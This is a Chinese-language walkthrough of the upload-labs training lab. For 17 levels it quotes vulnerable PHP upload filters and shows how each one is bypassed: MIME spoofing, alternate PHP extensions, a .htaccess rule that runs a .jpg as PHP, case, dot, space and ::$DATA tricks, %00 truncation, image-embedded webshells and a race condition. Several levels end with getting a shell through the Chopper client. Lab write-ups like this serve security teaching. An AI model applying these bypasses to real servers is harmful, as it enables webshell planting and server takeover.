image
upload-labs包含漏洞類型分類
[圖片上傳失敗...(image-e8da58-1563079608128)]
如何判斷上傳漏洞類型?
image
上傳的過程
image
Pass-01(前端JS繞過)
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("請選擇要上傳的文件!");
return false;
}
//定義允許上傳的文件類型
var allow_ext = ".jpg|.png|.gif";
//提取上傳文件的類型
var ext_name = file.substring(file.lastIndexOf("."));
//判斷上傳文件類型是否允許上傳
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "該文件不允許上傳,請上傳" + allow_ext + "類型的文件,當前文件類型為:" + ext_name;
alert(errMsg);
return false;
}
}
方法一:前端檢測缰盏。js的檢測只能位于client涌萤,可以禁用js,在瀏覽器設(shè)置中修改】诓拢或者直接改掉這里的 checkFile()
[圖片上傳失敗...(image-c1e938-1563079608128)]
修改之后就可以直接上傳.php文件,上傳之后復制圖像地址就可以得到上傳路徑了
image
image
方法二:上傳1.png直接抓包负溪,修改后綴為php就可以繞過上傳
[圖片上傳失敗...(image-9a1cc0-1563079608128)]
得到路徑/upload/1.php,連接菜刀,得到shell
image
Pass-02(MIME繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯暮的!';
}
} else {
$msg = '文件類型不正確,請重新上傳淌实!';
}
} else {
$msg = UPLOAD_PATH.'文件夾不存在,請手工創(chuàng)建冻辩!';
}
}
本節(jié)對數(shù)據(jù)包的MIME(content-type)進行了限定,只允許 image/jpeg拆祈、image/png恨闪、image/gif 圖片內(nèi)容數(shù)據(jù)傳輸。操作和第一節(jié)方法二一樣放坏。
上傳1.png直接抓包咙咽,修改后綴為php就可以繞過上傳
image
得到路徑/upload/1.php,連接菜刀,得到shell
[圖片上傳失敗...(image-f55372-1563079608128)]
Pass-03(上傳特殊可解析后綴繞過php4淤年、phtml)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯钧敞!';
}
} else {
$msg = '不允許上傳.asp,.aspx,.php,.jsp后綴文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建麸粮!';
}
}
查看源碼溉苛,發(fā)現(xiàn)是設(shè)置了文件后綴名黑名單,禁止上傳后綴名為.php文件弄诲,這里利用php2愚战、php3、php4齐遵、php5寂玲、phps、phtml一樣會解析梗摇,直接修改后綴名為phps上傳拓哟。
復制圖像地址
image
得到上傳路徑
image
常見擴展名繞過:
asp:asa,cer,cdx
aspx:ashx,asmx,ascx
php:php2、php3伶授、php4彰檬、php5伸刃、phps、phtml
jsp:jspx,jspf
Pass-04(上傳 .htaccess)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯逢倍!';
}
} else {
$msg = '此文件不允許上傳!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建捧颅!';
}
}
比剛才的黑名單多了不少,但是.htaccess還是沒有過濾较雕,可以重寫文件解析規(guī)則繞過碉哑,上傳一個.htaccess,文件內(nèi)容如下亮蒋,意思就是在upload目錄下匹配1.jpg的文件并以php文件執(zhí)行
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
上傳一個.htaccess
[圖片上傳失敗...(image-75493-1563079608128)]
上傳1.jpg,應(yīng)為重寫了文件解析規(guī)則扣典,1.jpg將會被以php文件執(zhí)行
image
然后直接連接菜刀
image
getshell
[圖片上傳失敗...(image-bfe0b7-1563079608128)]
.htaccess攻擊總結(jié)
有的時候由于各種名單的原因,可能我們不能上傳任何php文件慎玖,而且還沒有其他地方來解析成php贮尖,咋辦?如果你能上傳.htaccess文件的話趁怔,那么就很好辦了湿硝。
建一個.htaccess 文件,里面的內(nèi)容如下
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
這個時候就上傳一個文件名字是1.jpg的文件润努,然后里面是一句話木馬关斜,1.jpg就會被當成1.php執(zhí)行,就能成功連接菜刀
Pass-05(后綴大小寫繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯铺浇!';
}
} else {
$msg = '此文件類型不允許上傳痢畜!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建!';
}
}
Pass-04與Pass-05代碼對比
[圖片上傳失敗...(image-49a546-1563079608128)]
對比之后發(fā)現(xiàn)黑名單多了一個.htaccess
并且沒有將文件后綴轉(zhuǎn)小寫的代碼了
于是這里顯然可以用大小寫繞過鳍侣,例如 .Php .phP
[圖片上傳失敗...(image-22c27f-1563079608128)]
Pass-06(后綴末尾 加空格 繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯丁稀!';
}
} else {
$msg = '此文件不允許上傳';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建!';
}
}
Pass-05與Pass-06代碼對比
[圖片上傳失敗...(image-dc7d8d-1563079608128)]
發(fā)現(xiàn)刪去了將文件名前后去空格的操作 所以可以利用6.php(空格)
image
Pass-07(后綴末尾 加點 繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯倚聚!';
}
} else {
$msg = '此文件類型不允許上傳二驰!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建!';
}
}
Pass-06與Pass-07代碼對比
image
對比發(fā)現(xiàn)沒有去處文件末尾的點的操作了
于是利用
7.php.
image
Pass-08( ::$DATA 繞過 )
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯秉沼!';
}
} else {
$msg = '此文件類型不允許上傳桶雀!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建!';
}
}
Pass-07與Pass-08代碼對比
image
對比發(fā)現(xiàn)這里刪掉了
::$DATA的限制::$DATA備用流存在于每個文件唬复,因此它可以是訪問任何文件的替代方法所以使用
8.php::$DATA
image
Windows :: DATA備用數(shù)據(jù)流漏洞:
https://www.owasp.org/index.php/Windows_::DATA_alternate_data_stream
Pass-09(點和空格配合繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//刪除文件名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉(zhuǎn)換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯矗积!';
}
} else {
$msg = '此文件類型不允許上傳!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建敞咧!';
}
}
Pass-08與Pass-09代碼對比
[圖片上傳失敗...(image-6580e0-1563079608128)]
對比發(fā)現(xiàn)代碼后綴名處理的不夠嚴謹, 先去除了文件后面的. 再去除了文件后綴的空格, 由于只處理了一次, 所以可以通過上傳9.php. .雖然有去末尾點和去首尾空格的操作
但是并不是循環(huán)處理的
所以可以這樣構(gòu)造9.php. .
這樣經(jīng)過一輪處理后棘捣,變?yōu)?code>9.php.
image
Pass-10(雙后綴名繞過)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上傳出錯!';
}
} else {
$msg = UPLOAD_PATH . '文件夾不存在,請手工創(chuàng)建休建!';
}
}
發(fā)現(xiàn)關(guān)鍵點
$file_name = str_ireplace($deny_ext,"", $file_name);
//將文件名($file_name)中含有黑名單($deny_ext)的替換為""(刪除黑名單字符)
但是代碼并未循環(huán)過濾乍恐,于是存在10.pphphp
image
菜刀連接
[圖片上傳失敗...(image-cec363-1563079608128)]
getshell
[圖片上傳失敗...(image-37400d-1563079608128)]
Pass-11(%00截斷繞過)
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上傳出錯评疗!';
}
} else{
$msg = "只允許上傳.jpg|.png|.gif類型文件!";
}
}
發(fā)現(xiàn)關(guān)鍵點
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
上傳文件路徑由路徑+時間+后綴重新命名
1.PHP 版本 < 5.3.4
2.php.ini 中 magic_quotes_gpc=off
滿足上面的條件的時候php就是把%00當成結(jié)束符茵烈,后面的數(shù)據(jù)直接忽略
save_path可控百匆,因此00截斷即可。利用save_path=../upload/11.php%00
image
現(xiàn)在貌似成功不了
Pass-12(同上%00截斷)
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳失敗";
}
} else {
$msg = "只允許上傳.jpg|.png|.gif類型文件呜投!";
}
}
Pass-11與Pass-12代碼對比
image
這題跟上一題代碼唯一的不同就是
save_path 從 GET 變成了 POST, 此時不能再使用 %00 截斷, 原因是 %00 截斷在 GET 中被 url 解碼之后是空字符, 但是在 POST 中 %00 不會被 url 解碼, 所以只能通過 burpsuite 修改 hex 值為 00 進行截斷.在upload后面加上12.php+(添加+是為了方便改hex值)
image
這里把 2b('+'的 hex) 修改成 00
image
或者直接在upload后面加上
12.php%00加匈,然后選中%00實施URL-decode
image
由于環(huán)境沒配好,所以并沒有成功仑荐,但是原理是這樣的
網(wǎng)上找的別人成功的圖
image
$img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;其中
"/".rand(10, 99).date("YmdHis").".".$file_ext;會被截斷
Pass-13(圖片馬)
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只讀2字節(jié)
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知雕拼,上傳失敗粘招!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯啥寇!";
}
}
}
這關(guān)主要是利用了一個判斷文件的函數(shù)
fopen打開文件數(shù)據(jù)流
fread讀取2個字節(jié)
用unpack對二進制數(shù)據(jù)進行解包,C代表無符號字節(jié)型洒扎,后面的2代表個數(shù)辑甜,也可以用*代替
把兩個chars連接起來再用intval轉(zhuǎn)換為整數(shù)型
做一個圖片馬就可以繞過
圖片馬制作
方法一:
我們需要一張圖片1.jpg和一句話木馬寫好的php文件1.php
將1.jpg和1.php放到同一目錄下,
然后在該目錄下用cmd執(zhí)行命令copy 1.jpg/b + 1.php/a 2.jpg
新生成的2.jpg就是我們制作好的圖片馬
[圖片上傳失敗...(image-e1333e-1563079608128)]
方法二:
HxD打開一張圖片1.jpg
[圖片上傳失敗...(image-f10b81-1563079608128)]
在圖片末尾加上一句話木馬,保存得到的圖片就是圖片馬了
[圖片上傳失敗...(image-7c0020-1563079608128)]
Pass-14(突破exif_imagetype)
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知逊笆,上傳失斦淮痢岂傲!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯难裆!";
}
}
}
getimagesize判斷圖片內(nèi)置函數(shù),所以一樣可以使用圖片馬繞過.可以參考官方文檔http://php.net/manual/zh/function.getimagesize.php
image_type_to_extension取文件后綴的內(nèi)置函數(shù)http://php.net/manual/zh/function.image-type-to-extension.php
Pass-15(突破exif_imagetype)
function isImage($filename){
//需要開啟php_exif模塊
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上傳失斈饕础乃戈!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上傳出錯!";
}
}
}
exif_imagetype 也是判斷圖片的類型的亩进,所以一樣可以使用圖片馬繞過.具體可以看官方文檔http://php.net/manual/zh/function.exif-imagetype.php
Pass-16(圖片二次渲染)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 獲得上傳文件的基本信息症虑,文件名,類型归薛,大小谍憔,臨時文件路徑
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.basename($filename);
// 獲得上傳文件的擴展名
$fileext= substr(strrchr($filename,"."),1);
//判斷文件后綴與類型,合法才進行上傳操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path))
{
//使用上傳的圖片生成新的圖片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "該文件不是jpg格式的圖片主籍!";
@unlink($target_path);
}else{
//給新圖片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
$newimagepath = UPLOAD_PATH.$newfilename;
imagejpeg($im,$newimagepath);
//顯示二次渲染后的圖片(使用用戶上傳圖片生成的新圖片)
$img_path = UPLOAD_PATH.$newfilename;
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上傳出錯习贫!";
}
三段代差不多,取其中的一段來分析$target_path已經(jīng)用了basename來限制你修改目錄繞過的方法了千元。
$fileext以點為界苫昌,取點后面的字符作為后綴名。
變量$filetype獲取的值取判斷content-type是否符合條件
imagecreatefromjpeg判斷是否為圖片資源幸海,具體可以看官方文檔http://php.net/manual/zh/function.imagecreatefromjpeg.php
srand(time())看官方文檔http://php.net/manual/zh/function.srand.php祟身,和下面的strval(rand()) 相結(jié)合奥务,隨機數(shù)發(fā)生器的初始化,為了讓上傳的隨機文件名不重復袜硫。
imagecreatefromjpeg二次渲染它相當于是把原本屬于圖像數(shù)據(jù)的部分抓了出來氯葬,再用自己的API 或函數(shù)進行重新渲染在這個過程中非圖像數(shù)據(jù)的部分直接就隔離開了。
詳細繞過方法https://secgeek.net/bookfresh-vulnerability/
文章中提供的圖片馬POC.gif(在上述鏈接文章的最后面有)
[圖片上傳失敗...(image-61dc27-1563079608128)]
視頻繞過演示(翻墻才能看):https://youtu.be/z-_5a1wyPF0
Pass-17(條件競爭父款,大批量發(fā)包繞過)
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允許上傳.jpg|.png|.gif類型文件溢谤!";
unlink($upload_file);
}
}else{
$msg = '上傳出錯!';
}
}
通過白名單檢測后綴名憨攒,符合就rename改名世杀,不符合就unlink刪除文件。
參考:
Upload-labs&Upload Bypass Summarize
Upload-Labs上傳繞過
upload-labs刷關(guān)記錄
upload-labs WriteUp
圖片木馬制作大法
upload-labs 通關(guān)筆記
